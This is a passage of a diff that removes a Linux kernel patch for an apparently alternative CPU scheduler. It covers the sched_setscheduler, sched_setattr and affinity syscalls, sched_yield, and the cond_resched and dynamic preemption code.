-+	bool match;
-+
-+	rcu_read_lock();
-+	pcred = __task_cred(p);
-+	match = (uid_eq(cred->euid, pcred->euid) ||
-+		 uid_eq(cred->euid, pcred->uid));
-+	rcu_read_unlock();
-+	return match;
-+}
-+
-+/*
-+ * Allow unprivileged RT tasks to decrease priority.
-+ * Only issue a capable test if needed and only once to avoid an audit
-+ * event on permitted non-privileged operations:
-+ */
-+static int user_check_sched_setscheduler(struct task_struct *p,
-+					 const struct sched_attr *attr,
-+					 int policy, int reset_on_fork)
-+{
-+	if (rt_policy(policy)) {
-+		unsigned long rlim_rtprio = task_rlimit(p, RLIMIT_RTPRIO);
-+
-+		/* Can't set/change the rt policy: */
-+		if (policy != p->policy && !rlim_rtprio)
-+			goto req_priv;
-+
-+		/* Can't increase priority: */
-+		if (attr->sched_priority > p->rt_priority &&
-+		    attr->sched_priority > rlim_rtprio)
-+			goto req_priv;
-+	}
-+
-+	/* Can't change other user's priorities: */
-+	if (!check_same_owner(p))
-+		goto req_priv;
-+
-+	/* Normal users shall not reset the sched_reset_on_fork flag: */
-+	if (p->sched_reset_on_fork && !reset_on_fork)
-+		goto req_priv;
-+
-+	return 0;
-+
-+req_priv:
-+	if (!capable(CAP_SYS_NICE))
-+		return -EPERM;
-+
-+	return 0;
-+}
-+
-+static int __sched_setscheduler(struct task_struct *p,
-+				const struct sched_attr *attr,
-+				bool user, bool pi)
-+{
-+	const struct sched_attr dl_squash_attr = {
-+		.size		= sizeof(struct sched_attr),
-+		.sched_policy	= SCHED_FIFO,
-+		.sched_nice	= 0,
-+		.sched_priority = 99,
-+	};
-+	int oldpolicy = -1, policy = attr->sched_policy;
-+	int retval, newprio;
-+	struct balance_callback *head;
-+	unsigned long flags;
-+	struct rq *rq;
-+	int reset_on_fork;
-+	raw_spinlock_t *lock;
-+
-+	/* The pi code expects interrupts enabled */
-+	BUG_ON(pi && in_interrupt());
-+
-+	/*
-+	 * Alt schedule FW supports SCHED_DEADLINE by squash it as prio 0 SCHED_FIFO
-+	 */
-+	if (unlikely(SCHED_DEADLINE == policy)) {
-+		attr = &dl_squash_attr;
-+		policy = attr->sched_policy;
-+	}
-+recheck:
-+	/* Double check policy once rq lock held */
-+	if (policy < 0) {
-+		reset_on_fork = p->sched_reset_on_fork;
-+		policy = oldpolicy = p->policy;
-+	} else {
-+		reset_on_fork = !!(attr->sched_flags & SCHED_RESET_ON_FORK);
-+
-+		if (policy > SCHED_IDLE)
-+			return -EINVAL;
-+	}
-+
-+	if (attr->sched_flags & ~(SCHED_FLAG_ALL))
-+		return -EINVAL;
-+
-+	/*
-+	 * Valid priorities for SCHED_FIFO and SCHED_RR are
-+	 * 1..MAX_RT_PRIO-1, valid priority for SCHED_NORMAL and
-+	 * SCHED_BATCH and SCHED_IDLE is 0.
-+	 */
-+	if (attr->sched_priority < 0 ||
-+	    (p->mm && attr->sched_priority > MAX_RT_PRIO - 1) ||
-+	    (!p->mm && attr->sched_priority > MAX_RT_PRIO - 1))
-+		return -EINVAL;
-+	if ((SCHED_RR == policy || SCHED_FIFO == policy) !=
-+	    (attr->sched_priority != 0))
-+		return -EINVAL;
-+
-+	if (user) {
-+		retval = user_check_sched_setscheduler(p, attr, policy, reset_on_fork);
-+		if (retval)
-+			return retval;
-+
-+		retval = security_task_setscheduler(p);
-+		if (retval)
-+			return retval;
-+	}
-+
-+	if (pi)
-+		cpuset_read_lock();
-+
-+	/*
-+	 * Make sure no PI-waiters arrive (or leave) while we are
-+	 * changing the priority of the task:
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+
-+	/*
-+	 * To be able to change p->policy safely, task_access_lock()
-+	 * must be called.
-+	 * IF use task_access_lock() here:
-+	 * For the task p which is not running, reading rq->stop is
-+	 * racy but acceptable as ->stop doesn't change much.
-+	 * An enhancemnet can be made to read rq->stop saftly.
-+	 */
-+	rq = __task_access_lock(p, &lock);
-+
-+	/*
-+	 * Changing the policy of the stop threads its a very bad idea
-+	 */
-+	if (p == rq->stop) {
-+		retval = -EINVAL;
-+		goto unlock;
-+	}
-+
-+	/*
-+	 * If not changing anything there's no need to proceed further:
-+	 */
-+	if (unlikely(policy == p->policy)) {
-+		if (rt_policy(policy) && attr->sched_priority != p->rt_priority)
-+			goto change;
-+		if (!rt_policy(policy) &&
-+		    NICE_TO_PRIO(attr->sched_nice) != p->static_prio)
-+			goto change;
-+
-+		p->sched_reset_on_fork = reset_on_fork;
-+		retval = 0;
-+		goto unlock;
-+	}
-+change:
-+
-+	/* Re-check policy now with rq lock held */
-+	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
-+		policy = oldpolicy = -1;
-+		__task_access_unlock(p, lock);
-+		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+		if (pi)
-+			cpuset_read_unlock();
-+		goto recheck;
-+	}
-+
-+	p->sched_reset_on_fork = reset_on_fork;
-+
-+	newprio = __normal_prio(policy, attr->sched_priority, NICE_TO_PRIO(attr->sched_nice));
-+	if (pi) {
-+		/*
-+		 * Take priority boosted tasks into account. If the new
-+		 * effective priority is unchanged, we just store the new
-+		 * normal parameters and do not touch the scheduler class and
-+		 * the runqueue. This will be done when the task deboost
-+		 * itself.
-+		 */
-+		newprio = rt_effective_prio(p, newprio);
-+	}
-+
-+	if (!(attr->sched_flags & SCHED_FLAG_KEEP_PARAMS)) {
-+		__setscheduler_params(p, attr);
-+		__setscheduler_prio(p, newprio);
-+	}
-+
-+	check_task_changed(p, rq);
-+
-+	/* Avoid rq from going away on us: */
-+	preempt_disable();
-+	head = splice_balance_callbacks(rq);
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	if (pi) {
-+		cpuset_read_unlock();
-+		rt_mutex_adjust_pi(p);
-+	}
-+
-+	/* Run balance callbacks after we've adjusted the PI chain: */
-+	balance_callbacks(rq, head);
-+	preempt_enable();
-+
-+	return 0;
-+
-+unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+	if (pi)
-+		cpuset_read_unlock();
-+	return retval;
-+}
-+
-+static int _sched_setscheduler(struct task_struct *p, int policy,
-+			       const struct sched_param *param, bool check)
-+{
-+	struct sched_attr attr = {
-+		.sched_policy   = policy,
-+		.sched_priority = param->sched_priority,
-+		.sched_nice     = PRIO_TO_NICE(p->static_prio),
-+	};
-+
-+	/* Fixup the legacy SCHED_RESET_ON_FORK hack. */
-+	if ((policy != SETPARAM_POLICY) && (policy & SCHED_RESET_ON_FORK)) {
-+		attr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
-+		policy &= ~SCHED_RESET_ON_FORK;
-+		attr.sched_policy = policy;
-+	}
-+
-+	return __sched_setscheduler(p, &attr, check, true);
-+}
-+
-+/**
-+ * sched_setscheduler - change the scheduling policy and/or RT priority of a thread.
-+ * @p: the task in question.
-+ * @policy: new policy.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Use sched_set_fifo(), read its comment.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ *
-+ * NOTE that the task may be already dead.
-+ */
-+int sched_setscheduler(struct task_struct *p, int policy,
-+		       const struct sched_param *param)
-+{
-+	return _sched_setscheduler(p, policy, param, true);
-+}
-+
-+int sched_setattr(struct task_struct *p, const struct sched_attr *attr)
-+{
-+	return __sched_setscheduler(p, attr, true, true);
-+}
-+
-+int sched_setattr_nocheck(struct task_struct *p, const struct sched_attr *attr)
-+{
-+	return __sched_setscheduler(p, attr, false, true);
-+}
-+EXPORT_SYMBOL_GPL(sched_setattr_nocheck);
-+
-+/**
-+ * sched_setscheduler_nocheck - change the scheduling policy and/or RT priority of a thread from kernelspace.
-+ * @p: the task in question.
-+ * @policy: new policy.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Just like sched_setscheduler, only don't bother checking if the
-+ * current context has permission.  For example, this is needed in
-+ * stop_machine(): we create temporary high priority worker threads,
-+ * but our caller might not have that capability.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+int sched_setscheduler_nocheck(struct task_struct *p, int policy,
-+			       const struct sched_param *param)
-+{
-+	return _sched_setscheduler(p, policy, param, false);
-+}
-+
-+/*
-+ * SCHED_FIFO is a broken scheduler model; that is, it is fundamentally
-+ * incapable of resource management, which is the one thing an OS really should
-+ * be doing.
-+ *
-+ * This is of course the reason it is limited to privileged users only.
-+ *
-+ * Worse still; it is fundamentally impossible to compose static priority
-+ * workloads. You cannot take two correctly working static prio workloads
-+ * and smash them together and still expect them to work.
-+ *
-+ * For this reason 'all' FIFO tasks the kernel creates are basically at:
-+ *
-+ *   MAX_RT_PRIO / 2
-+ *
-+ * The administrator _MUST_ configure the system, the kernel simply doesn't
-+ * know enough information to make a sensible choice.
-+ */
-+void sched_set_fifo(struct task_struct *p)
-+{
-+	struct sched_param sp = { .sched_priority = MAX_RT_PRIO / 2 };
-+	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_fifo);
-+
-+/*
-+ * For when you don't much care about FIFO, but want to be above SCHED_NORMAL.
-+ */
-+void sched_set_fifo_low(struct task_struct *p)
-+{
-+	struct sched_param sp = { .sched_priority = 1 };
-+	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_fifo_low);
-+
-+void sched_set_normal(struct task_struct *p, int nice)
-+{
-+	struct sched_attr attr = {
-+		.sched_policy = SCHED_NORMAL,
-+		.sched_nice = nice,
-+	};
-+	WARN_ON_ONCE(sched_setattr_nocheck(p, &attr) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_normal);
-+
-+static int
-+do_sched_setscheduler(pid_t pid, int policy, struct sched_param __user *param)
-+{
-+	struct sched_param lparam;
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!param || pid < 0)
-+		return -EINVAL;
-+	if (copy_from_user(&lparam, param, sizeof(struct sched_param)))
-+		return -EFAULT;
-+
-+	rcu_read_lock();
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (likely(p))
-+		get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (likely(p)) {
-+		retval = sched_setscheduler(p, policy, &lparam);
-+		put_task_struct(p);
-+	}
-+
-+	return retval;
-+}
-+
-+/*
-+ * Mimics kernel/events/core.c perf_copy_attr().
-+ */
-+static int sched_copy_attr(struct sched_attr __user *uattr, struct sched_attr *attr)
-+{
-+	u32 size;
-+	int ret;
-+
-+	/* Zero the full structure, so that a short copy will be nice: */
-+	memset(attr, 0, sizeof(*attr));
-+
-+	ret = get_user(size, &uattr->size);
-+	if (ret)
-+		return ret;
-+
-+	/* ABI compatibility quirk: */
-+	if (!size)
-+		size = SCHED_ATTR_SIZE_VER0;
-+
-+	if (size < SCHED_ATTR_SIZE_VER0 || size > PAGE_SIZE)
-+		goto err_size;
-+
-+	ret = copy_struct_from_user(attr, sizeof(*attr), uattr, size);
-+	if (ret) {
-+		if (ret == -E2BIG)
-+			goto err_size;
-+		return ret;
-+	}
-+
-+	/*
-+	 * XXX: Do we want to be lenient like existing syscalls; or do we want
-+	 * to be strict and return an error on out-of-bounds values?
-+	 */
-+	attr->sched_nice = clamp(attr->sched_nice, -20, 19);
-+
-+	/* sched/core.c uses zero here but we already know ret is zero */
-+	return 0;
-+
-+err_size:
-+	put_user(sizeof(*attr), &uattr->size);
-+	return -E2BIG;
-+}
-+
-+/**
-+ * sys_sched_setscheduler - set/change the scheduler policy and RT priority
-+ * @pid: the pid in question.
-+ * @policy: new policy.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ * @param: structure containing the new RT priority.
-+ */
-+SYSCALL_DEFINE3(sched_setscheduler, pid_t, pid, int, policy, struct sched_param __user *, param)
-+{
-+	if (policy < 0)
-+		return -EINVAL;
-+
-+	return do_sched_setscheduler(pid, policy, param);
-+}
-+
-+/**
-+ * sys_sched_setparam - set/change the RT priority of a thread
-+ * @pid: the pid in question.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+SYSCALL_DEFINE2(sched_setparam, pid_t, pid, struct sched_param __user *, param)
-+{
-+	return do_sched_setscheduler(pid, SETPARAM_POLICY, param);
-+}
-+
-+/**
-+ * sys_sched_setattr - same as above, but with extended sched_attr
-+ * @pid: the pid in question.
-+ * @uattr: structure containing the extended parameters.
-+ */
-+SYSCALL_DEFINE3(sched_setattr, pid_t, pid, struct sched_attr __user *, uattr,
-+			       unsigned int, flags)
-+{
-+	struct sched_attr attr;
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!uattr || pid < 0 || flags)
-+		return -EINVAL;
-+
-+	retval = sched_copy_attr(uattr, &attr);
-+	if (retval)
-+		return retval;
-+
-+	if ((int)attr.sched_policy < 0)
-+		return -EINVAL;
-+
-+	rcu_read_lock();
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (likely(p))
-+		get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (likely(p)) {
-+		retval = sched_setattr(p, &attr);
-+		put_task_struct(p);
-+	}
-+
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getscheduler - get the policy (scheduling class) of a thread
-+ * @pid: the pid in question.
-+ *
-+ * Return: On success, the policy of the thread. Otherwise, a negative error
-+ * code.
-+ */
-+SYSCALL_DEFINE1(sched_getscheduler, pid_t, pid)
-+{
-+	struct task_struct *p;
-+	int retval = -EINVAL;
-+
-+	if (pid < 0)
-+		goto out_nounlock;
-+
-+	retval = -ESRCH;
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	if (p) {
-+		retval = security_task_getscheduler(p);
-+		if (!retval)
-+			retval = p->policy;
-+	}
-+	rcu_read_unlock();
-+
-+out_nounlock:
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getscheduler - get the RT priority of a thread
-+ * @pid: the pid in question.
-+ * @param: structure containing the RT priority.
-+ *
-+ * Return: On success, 0 and the RT priority is in @param. Otherwise, an error
-+ * code.
-+ */
-+SYSCALL_DEFINE2(sched_getparam, pid_t, pid, struct sched_param __user *, param)
-+{
-+	struct sched_param lp = { .sched_priority = 0 };
-+	struct task_struct *p;
-+	int retval = -EINVAL;
-+
-+	if (!param || pid < 0)
-+		goto out_nounlock;
-+
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	retval = -ESRCH;
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	if (task_has_rt_policy(p))
-+		lp.sched_priority = p->rt_priority;
-+	rcu_read_unlock();
-+
-+	/*
-+	 * This one might sleep, we cannot do it with a spinlock held ...
-+	 */
-+	retval = copy_to_user(param, &lp, sizeof(*param)) ? -EFAULT : 0;
-+
-+out_nounlock:
-+	return retval;
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+/*
-+ * Copy the kernel size attribute structure (which might be larger
-+ * than what user-space knows about) to user-space.
-+ *
-+ * Note that all cases are valid: user-space buffer can be larger or
-+ * smaller than the kernel-space buffer. The usual case is that both
-+ * have the same size.
-+ */
-+static int
-+sched_attr_copy_to_user(struct sched_attr __user *uattr,
-+			struct sched_attr *kattr,
-+			unsigned int usize)
-+{
-+	unsigned int ksize = sizeof(*kattr);
-+
-+	if (!access_ok(uattr, usize))
-+		return -EFAULT;
-+
-+	/*
-+	 * sched_getattr() ABI forwards and backwards compatibility:
-+	 *
-+	 * If usize == ksize then we just copy everything to user-space and all is good.
-+	 *
-+	 * If usize < ksize then we only copy as much as user-space has space for,
-+	 * this keeps ABI compatibility as well. We skip the rest.
-+	 *
-+	 * If usize > ksize then user-space is using a newer version of the ABI,
-+	 * which part the kernel doesn't know about. Just ignore it - tooling can
-+	 * detect the kernel's knowledge of attributes from the attr->size value
-+	 * which is set to ksize in this case.
-+	 */
-+	kattr->size = min(usize, ksize);
-+
-+	if (copy_to_user(uattr, kattr, kattr->size))
-+		return -EFAULT;
-+
-+	return 0;
-+}
-+
-+/**
-+ * sys_sched_getattr - similar to sched_getparam, but with sched_attr
-+ * @pid: the pid in question.
-+ * @uattr: structure containing the extended parameters.
-+ * @usize: sizeof(attr) for fwd/bwd comp.
-+ * @flags: for future extension.
-+ */
-+SYSCALL_DEFINE4(sched_getattr, pid_t, pid, struct sched_attr __user *, uattr,
-+		unsigned int, usize, unsigned int, flags)
-+{
-+	struct sched_attr kattr = { };
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!uattr || pid < 0 || usize > PAGE_SIZE ||
-+	    usize < SCHED_ATTR_SIZE_VER0 || flags)
-+		return -EINVAL;
-+
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	retval = -ESRCH;
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	kattr.sched_policy = p->policy;
-+	if (p->sched_reset_on_fork)
-+		kattr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
-+	if (task_has_rt_policy(p))
-+		kattr.sched_priority = p->rt_priority;
-+	else
-+		kattr.sched_nice = task_nice(p);
-+	kattr.sched_flags &= SCHED_FLAG_ALL;
-+
-+#ifdef CONFIG_UCLAMP_TASK
-+	kattr.sched_util_min = p->uclamp_req[UCLAMP_MIN].value;
-+	kattr.sched_util_max = p->uclamp_req[UCLAMP_MAX].value;
-+#endif
-+
-+	rcu_read_unlock();
-+
-+	return sched_attr_copy_to_user(uattr, &kattr, usize);
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+#ifdef CONFIG_SMP
-+int dl_task_check_affinity(struct task_struct *p, const struct cpumask *mask)
-+{
-+	return 0;
-+}
-+#endif
-+
-+static int
-+__sched_setaffinity(struct task_struct *p, const struct cpumask *mask)
-+{
-+	int retval;
-+	cpumask_var_t cpus_allowed, new_mask;
-+
-+	if (!alloc_cpumask_var(&cpus_allowed, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL)) {
-+		retval = -ENOMEM;
-+		goto out_free_cpus_allowed;
-+	}
-+
-+	cpuset_cpus_allowed(p, cpus_allowed);
-+	cpumask_and(new_mask, mask, cpus_allowed);
-+again:
-+	retval = __set_cpus_allowed_ptr(p, new_mask, SCA_CHECK | SCA_USER);
-+	if (retval)
-+		goto out_free_new_mask;
-+
-+	cpuset_cpus_allowed(p, cpus_allowed);
-+	if (!cpumask_subset(new_mask, cpus_allowed)) {
-+		/*
-+		 * We must have raced with a concurrent cpuset
-+		 * update. Just reset the cpus_allowed to the
-+		 * cpuset's cpus_allowed
-+		 */
-+		cpumask_copy(new_mask, cpus_allowed);
-+		goto again;
-+	}
-+
-+out_free_new_mask:
-+	free_cpumask_var(new_mask);
-+out_free_cpus_allowed:
-+	free_cpumask_var(cpus_allowed);
-+	return retval;
-+}
-+
-+long sched_setaffinity(pid_t pid, const struct cpumask *in_mask)
-+{
-+	struct task_struct *p;
-+	int retval;
-+
-+	rcu_read_lock();
-+
-+	p = find_process_by_pid(pid);
-+	if (!p) {
-+		rcu_read_unlock();
-+		return -ESRCH;
-+	}
-+
-+	/* Prevent p going away */
-+	get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (p->flags & PF_NO_SETAFFINITY) {
-+		retval = -EINVAL;
-+		goto out_put_task;
-+	}
-+
-+	if (!check_same_owner(p)) {
-+		rcu_read_lock();
-+		if (!ns_capable(__task_cred(p)->user_ns, CAP_SYS_NICE)) {
-+			rcu_read_unlock();
-+			retval = -EPERM;
-+			goto out_put_task;
-+		}
-+		rcu_read_unlock();
-+	}
-+
-+	retval = security_task_setscheduler(p);
-+	if (retval)
-+		goto out_put_task;
-+
-+	retval = __sched_setaffinity(p, in_mask);
-+out_put_task:
-+	put_task_struct(p);
-+	return retval;
-+}
-+
-+static int get_user_cpu_mask(unsigned long __user *user_mask_ptr, unsigned len,
-+			     struct cpumask *new_mask)
-+{
-+	if (len < cpumask_size())
-+		cpumask_clear(new_mask);
-+	else if (len > cpumask_size())
-+		len = cpumask_size();
-+
-+	return copy_from_user(new_mask, user_mask_ptr, len) ? -EFAULT : 0;
-+}
-+
-+/**
-+ * sys_sched_setaffinity - set the CPU affinity of a process
-+ * @pid: pid of the process
-+ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
-+ * @user_mask_ptr: user-space pointer to the new CPU mask
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+SYSCALL_DEFINE3(sched_setaffinity, pid_t, pid, unsigned int, len,
-+		unsigned long __user *, user_mask_ptr)
-+{
-+	cpumask_var_t new_mask;
-+	int retval;
-+
-+	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	retval = get_user_cpu_mask(user_mask_ptr, len, new_mask);
-+	if (retval == 0)
-+		retval = sched_setaffinity(pid, new_mask);
-+	free_cpumask_var(new_mask);
-+	return retval;
-+}
-+
-+long sched_getaffinity(pid_t pid, cpumask_t *mask)
-+{
-+	struct task_struct *p;
-+	raw_spinlock_t *lock;
-+	unsigned long flags;
-+	int retval;
-+
-+	rcu_read_lock();
-+
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	task_access_lock_irqsave(p, &lock, &flags);
-+	cpumask_and(mask, &p->cpus_mask, cpu_active_mask);
-+	task_access_unlock_irqrestore(p, lock, &flags);
-+
-+out_unlock:
-+	rcu_read_unlock();
-+
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getaffinity - get the CPU affinity of a process
-+ * @pid: pid of the process
-+ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
-+ * @user_mask_ptr: user-space pointer to hold the current CPU mask
-+ *
-+ * Return: size of CPU mask copied to user_mask_ptr on success. An
-+ * error code otherwise.
-+ */
-+SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
-+		unsigned long __user *, user_mask_ptr)
-+{
-+	int ret;
-+	cpumask_var_t mask;
-+
-+	if ((len * BITS_PER_BYTE) < nr_cpu_ids)
-+		return -EINVAL;
-+	if (len & (sizeof(unsigned long)-1))
-+		return -EINVAL;
-+
-+	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	ret = sched_getaffinity(pid, mask);
-+	if (ret == 0) {
-+		unsigned int retlen = min_t(size_t, len, cpumask_size());
-+
-+		if (copy_to_user(user_mask_ptr, mask, retlen))
-+			ret = -EFAULT;
-+		else
-+			ret = retlen;
-+	}
-+	free_cpumask_var(mask);
-+
-+	return ret;
-+}
-+
-+static void do_sched_yield(void)
-+{
-+	struct rq *rq;
-+	struct rq_flags rf;
-+
-+	if (!sched_yield_type)
-+		return;
-+
-+	rq = this_rq_lock_irq(&rf);
-+
-+	schedstat_inc(rq->yld_count);
-+
-+	if (1 == sched_yield_type) {
-+		if (!rt_task(current))
-+			do_sched_yield_type_1(current, rq);
-+	} else if (2 == sched_yield_type) {
-+		if (rq->nr_running > 1)
-+			rq->skip = current;
-+	}
-+
-+	preempt_disable();
-+	raw_spin_unlock_irq(&rq->lock);
-+	sched_preempt_enable_no_resched();
-+
-+	schedule();
-+}
-+
-+/**
-+ * sys_sched_yield - yield the current processor to other threads.
-+ *
-+ * This function yields the current CPU to other tasks. If there are no
-+ * other threads running on this CPU then this function will return.
-+ *
-+ * Return: 0.
-+ */
-+SYSCALL_DEFINE0(sched_yield)
-+{
-+	do_sched_yield();
-+	return 0;
-+}
-+
-+#if !defined(CONFIG_PREEMPTION) || defined(CONFIG_PREEMPT_DYNAMIC)
-+int __sched __cond_resched(void)
-+{
-+	if (should_resched(0)) {
-+		preempt_schedule_common();
-+		return 1;
-+	}
-+	/*
-+	 * In preemptible kernels, ->rcu_read_lock_nesting tells the tick
-+	 * whether the current CPU is in an RCU read-side critical section,
-+	 * so the tick can report quiescent states even for CPUs looping
-+	 * in kernel context.  In contrast, in non-preemptible kernels,
-+	 * RCU readers leave no in-memory hints, which means that CPU-bound
-+	 * processes executing in kernel context might never report an
-+	 * RCU quiescent state.  Therefore, the following code causes
-+	 * cond_resched() to report a quiescent state, but only when RCU
-+	 * is in urgent need of one.
-+	 */
-+#ifndef CONFIG_PREEMPT_RCU
-+	rcu_all_qs();
-+#endif
-+	return 0;
-+}
-+EXPORT_SYMBOL(__cond_resched);
-+#endif
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#define cond_resched_dynamic_enabled	__cond_resched
-+#define cond_resched_dynamic_disabled	((void *)&__static_call_return0)
-+DEFINE_STATIC_CALL_RET0(cond_resched, __cond_resched);
-+EXPORT_STATIC_CALL_TRAMP(cond_resched);
-+
-+#define might_resched_dynamic_enabled	__cond_resched
-+#define might_resched_dynamic_disabled	((void *)&__static_call_return0)
-+DEFINE_STATIC_CALL_RET0(might_resched, __cond_resched);
-+EXPORT_STATIC_CALL_TRAMP(might_resched);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_FALSE(sk_dynamic_cond_resched);
-+int __sched dynamic_cond_resched(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_cond_resched))
-+		return 0;
-+	return __cond_resched();
-+}
-+EXPORT_SYMBOL(dynamic_cond_resched);
-+
-+static DEFINE_STATIC_KEY_FALSE(sk_dynamic_might_resched);
-+int __sched dynamic_might_resched(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_might_resched))
-+		return 0;
-+	return __cond_resched();
-+}
-+EXPORT_SYMBOL(dynamic_might_resched);
-+#endif
-+#endif
-+
-+/*
-+ * __cond_resched_lock() - if a reschedule is pending, drop the given lock,
-+ * call schedule, and on return reacquire the lock.
-+ *
-+ * This works OK both with and without CONFIG_PREEMPTION.  We do strange low-level
-+ * operations here to prevent schedule() from being called twice (once via
-+ * spin_unlock(), once by hand).
-+ */
-+int __cond_resched_lock(spinlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held(lock);
-+
-+	if (spin_needbreak(lock) || resched) {
-+		spin_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		spin_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_lock);
-+
-+int __cond_resched_rwlock_read(rwlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held_read(lock);
-+
-+	if (rwlock_needbreak(lock) || resched) {
-+		read_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		read_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_rwlock_read);
-+
-+int __cond_resched_rwlock_write(rwlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held_write(lock);
-+
-+	if (rwlock_needbreak(lock) || resched) {
-+		write_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		write_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_rwlock_write);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+
-+#ifdef CONFIG_GENERIC_ENTRY
-+#include <linux/entry-common.h>
-+#endif
-+
-+/*
-+ * SC:cond_resched
-+ * SC:might_resched
-+ * SC:preempt_schedule
-+ * SC:preempt_schedule_notrace
-+ * SC:irqentry_exit_cond_resched
-+ *
-+ *
-+ * NONE:
-+ *   cond_resched               <- __cond_resched
-+ *   might_resched              <- RET0
-+ *   preempt_schedule           <- NOP
-+ *   preempt_schedule_notrace   <- NOP
-+ *   irqentry_exit_cond_resched <- NOP
-+ *
-+ * VOLUNTARY:
-+ *   cond_resched               <- __cond_resched
-+ *   might_resched              <- __cond_resched
-+ *   preempt_schedule           <- NOP
-+ *   preempt_schedule_notrace   <- NOP
-+ *   irqentry_exit_cond_resched <- NOP
-+ *
-+ * FULL:
-+ *   cond_resched               <- RET0
-+ *   might_resched              <- RET0
-+ *   preempt_schedule           <- preempt_schedule
-+ *   preempt_schedule_notrace   <- preempt_schedule_notrace
-+ *   irqentry_exit_cond_resched <- irqentry_exit_cond_resched
-+ */
-+
-+enum {
-+	preempt_dynamic_undefined = -1,
-+	preempt_dynamic_none,
-+	preempt_dynamic_voluntary,
-+	preempt_dynamic_full,
-+};
-+
-+int preempt_dynamic_mode = preempt_dynamic_undefined;
-+
-+int sched_dynamic_mode(const char *str)
-+{
-+	if (!strcmp(str, "none"))
-+		return preempt_dynamic_none;
-+
-+	if (!strcmp(str, "voluntary"))
-+		return preempt_dynamic_voluntary;
-+
-+	if (!strcmp(str, "full"))
-+		return preempt_dynamic_full;
-+
-+	return -EINVAL;
-+}
-+
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#define preempt_dynamic_enable(f)	static_call_update(f, f##_dynamic_enabled)
-+#define preempt_dynamic_disable(f)	static_call_update(f, f##_dynamic_disabled)
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+#define preempt_dynamic_enable(f)	static_key_enable(&sk_dynamic_##f.key)
-+#define preempt_dynamic_disable(f)	static_key_disable(&sk_dynamic_##f.key)
